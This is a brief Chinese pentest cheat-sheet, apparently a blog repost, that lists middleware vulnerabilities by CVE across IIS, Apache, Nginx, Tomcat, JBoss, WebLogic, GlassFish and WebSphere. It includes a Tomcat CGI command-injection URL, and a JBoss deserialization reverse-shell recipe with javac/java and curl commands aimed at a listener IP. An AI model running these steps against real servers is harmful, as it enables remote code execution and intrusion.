之前看吐司别人发的个文档,简单记的笔记
-----
IIS
CVE-2017-7269
Apache
CVE-2017-15715
Nginx
location /files {
}
Tomcat
CVE-2019-0232
, 7.0.0 ~ 7.0.93
随意上传lxhsec.bat
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat + 弱口令 && 后台getshell漏洞
Tomcat manager App 暴力破解
JBoss 默认端口8080 9990
CVE-2017-12149
利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
WebLogic 默认端口7001
CVE-2017-10271 & CVE-2017-3506
CVE-2019-2725
/_async/
/uddiexplorer/SearchPublicRegistries.jsp
GlassFish 默认端口:8080(Web应用端口,即网站内容),4848(GlassFish管理中心)
GlassFish Directory Traversal(CVE-2017-1000028
GlassFish 后台
WebSphere
Java反序列化(CVE-2015-7450)
system/ manager
来源:博客园
作者:君莫笑hhhhhh
链接:https://www.cnblogs.com/junmoxiao/p/11774772.html